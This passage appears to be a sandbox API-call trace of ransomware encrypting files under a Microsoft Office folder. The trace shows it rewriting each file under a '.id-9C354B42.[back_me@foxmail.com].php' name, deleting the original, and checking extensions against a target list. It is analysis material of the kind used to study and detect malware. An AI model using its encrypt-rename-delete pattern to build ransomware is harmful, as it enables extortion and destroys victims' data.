liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.976] SetEndOfFile (hFile=0x388) returned 1 [0252.978] CloseHandle (hObject=0x388) returned 1 [0252.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0252.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 1 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString=".doc") returned 4 [0252.979] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0252.979] lstrlenW (lpString=".docx") returned 5 [0252.979] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0252.979] lstrlenW (lpString=".pdf") returned 4 [0252.979] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0252.979] lstrlenW (lpString=".xls") returned 4 [0252.979] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0252.979] lstrlenW (lpString=".xlsx") returned 5 [0252.979] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0252.979] lstrlenW (lpString=".ppt") returned 4 [0252.979] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString=".zip") returned 4 [0252.979] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0252.979] lstrlenW (lpString=".rar") returned 4 [0252.979] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0252.979] lstrlenW (lpString=".bz2") returned 4 [0252.979] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0252.979] lstrlenW (lpString=".7z") returned 3 [0252.979] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString=".dbf") returned 4 [0252.979] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString=".1cd") returned 4 [0252.979] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0252.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.979] lstrlenW (lpString=".jpg") returned 4 [0252.979] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString=".doc") returned 4 [0252.980] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0252.980] lstrlenW (lpString=".docx") returned 5 [0252.980] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0252.980] lstrlenW (lpString=".pdf") returned 4 [0252.980] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString=".xls") returned 4 [0252.980] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString=".xlsx") returned 5 [0252.980] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0252.980] lstrlenW (lpString=".ppt") returned 4 [0252.980] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString=".zip") returned 4 [0252.980] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString=".rar") returned 4 [0252.980] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0252.980] lstrlenW (lpString=".bz2") returned 4 [0252.980] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0252.980] lstrlenW (lpString=".7z") returned 3 [0252.980] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString=".dbf") returned 4 [0252.980] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString=".1cd") returned 4 [0252.980] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0252.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0252.980] lstrlenW (lpString=".jpg") returned 4 [0252.980] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0252.981] lstrcmpiW (lpString1=".HXK", lpString2=".php") returned -1 [0252.981] lstrlenW (lpString="GROOVE_K_COL.HXK") returned 16 [0252.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.981] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=110) returned 1 [0252.981] CloseHandle (hObject=0x388) returned 1 [0252.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 0x20 [0252.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0252.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0252.981] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.981] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0252.982] GetLastError () returned 0x0 [0252.982] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x6e, lpOverlapped=0x0) returned 1 [0252.982] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x70, lpOverlapped=0x0) returned 1 [0252.983] ReadFile (in: hFile=0x388, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0252.983] WriteFile (in: hFile=0x204, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0252.983] SetEndOfFile (hFile=0x204) returned 1 [0252.983] CloseHandle (hObject=0x204) returned 1 [0252.983] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0252.983] SetEndOfFile (hFile=0x388) returned 1 [0252.986] CloseHandle (hObject=0x388) returned 1 [0252.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0252.986] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 1 [0252.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.986] lstrlenW (lpString=".doc") returned 4 [0252.986] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0252.986] lstrlenW (lpString=".docx") returned 5 [0252.986] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0252.986] lstrlenW (lpString=".pdf") returned 4 [0252.986] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0252.986] lstrlenW (lpString=".xls") returned 4 [0252.986] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0252.986] lstrlenW (lpString=".xlsx") returned 5 [0252.986] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0252.987] lstrlenW (lpString=".ppt") returned 4 [0252.987] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString=".zip") returned 4 [0252.987] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString=".rar") returned 4 [0252.987] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString=".bz2") returned 4 [0252.987] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0252.987] lstrlenW (lpString=".7z") returned 3 [0252.987] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString=".dbf") returned 4 [0252.987] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString=".1cd") returned 4 [0252.987] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString=".jpg") returned 4 [0252.987] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.987] lstrlenW (lpString=".doc") returned 4 [0252.987] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0252.987] lstrlenW (lpString=".docx") returned 5 [0252.987] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0252.987] lstrlenW (lpString=".pdf") returned 4 [0252.987] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString=".xls") returned 4 [0252.987] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0252.987] lstrlenW (lpString=".xlsx") returned 5 [0252.987] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0252.988] lstrlenW (lpString=".ppt") returned 4 [0252.988] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0252.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.988] lstrlenW (lpString=".zip") returned 4 [0252.988] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0252.988] lstrlenW (lpString=".rar") returned 4 [0252.988] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0252.988] lstrlenW (lpString=".bz2") returned 4 [0252.988] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0252.988] lstrlenW (lpString=".7z") returned 3 [0252.988] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0252.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.988] lstrlenW (lpString=".dbf") returned 4 [0252.988] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0252.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.988] lstrlenW (lpString=".1cd") returned 4 [0252.988] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0252.988] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0252.988] lstrlenW (lpString=".jpg") returned 4 [0252.988] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0252.988] lstrcmpiW (lpString1=".VSL", lpString2=".php") returned 1 [0252.988] lstrlenW (lpString="HVAC.VSL") returned 8 [0252.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0253.114] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=36200) returned 1 [0253.114] CloseHandle (hObject=0x384) returned 1 [0253.114] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 0x20 [0253.136] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.213] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.213] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0253.213] GetLastError () returned 0x0 [0253.213] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x8d68, lpOverlapped=0x0) returned 1 [0253.227] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x8d70, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x8d70, lpOverlapped=0x0) returned 1 [0253.228] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.228] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0253.229] SetEndOfFile (hFile=0x210) returned 1 [0253.229] CloseHandle (hObject=0x210) returned 1 [0253.229] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.229] SetEndOfFile (hFile=0x398) returned 1 [0253.231] CloseHandle (hObject=0x398) returned 1 [0253.231] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.231] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\hvac.vsl")) returned 1 [0253.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString=".doc") returned 4 [0253.232] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString=".docx") returned 5 [0253.232] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0253.232] lstrlenW (lpString=".pdf") returned 4 [0253.232] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString=".xls") returned 4 [0253.232] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0253.232] lstrlenW (lpString=".xlsx") returned 5 [0253.232] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0253.232] lstrlenW (lpString=".ppt") returned 4 [0253.232] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString=".zip") returned 4 [0253.232] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0253.232] lstrlenW (lpString=".rar") returned 4 [0253.232] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString=".bz2") returned 4 [0253.232] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString=".7z") returned 3 [0253.232] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString=".dbf") returned 4 [0253.232] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString=".1cd") returned 4 [0253.232] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString=".jpg") returned 4 [0253.232] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.233] lstrlenW (lpString=".doc") returned 4 [0253.233] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString=".docx") returned 5 [0253.233] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1 [0253.233] lstrlenW (lpString=".pdf") returned 4 [0253.233] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString=".xls") returned 4 [0253.233] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0253.233] lstrlenW (lpString=".xlsx") returned 5 [0253.233] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1 [0253.233] lstrlenW (lpString=".ppt") returned 4 [0253.233] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.233] lstrlenW (lpString=".zip") returned 4 [0253.233] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0253.233] lstrlenW (lpString=".rar") returned 4 [0253.233] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString=".bz2") returned 4 [0253.233] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString=".7z") returned 3 [0253.233] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0253.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.233] lstrlenW (lpString=".dbf") returned 4 [0253.233] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.233] lstrlenW (lpString=".1cd") returned 4 [0253.233] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0253.233] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56 [0253.233] lstrlenW (lpString=".jpg") returned 4 [0253.233] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0253.233] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0253.234] lstrlenW (lpString="INFOPATHEDITOR_COL.HXT") returned 22 [0253.234] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0253.244] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=214) returned 1 [0253.244] CloseHandle (hObject=0x390) returned 1 [0253.244] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 0x20 [0253.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0253.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0253.272] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.272] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.272] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0253.273] GetLastError () returned 0x0 [0253.273] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xd6, lpOverlapped=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0253.274] ReadFile (in: hFile=0x398, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0253.274] WriteFile (in: hFile=0x210, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x100, lpOverlapped=0x0) returned 1 [0253.274] SetEndOfFile (hFile=0x210) returned 1 [0253.274] CloseHandle (hObject=0x210) returned 1 [0253.274] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0253.274] SetEndOfFile (hFile=0x398) returned 1 [0253.277] CloseHandle (hObject=0x398) returned 1 [0253.277] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0253.277] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 1 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70 [0253.278] lstrlenW (lpString=".doc") returned 4 [0253.278] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0253.278] lstrlenW (lpString=".docx") returned 5 [0253.278] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0253.278] lstrlenW (lpString=".pdf") returned 4 [0253.278] lstrcmpiW 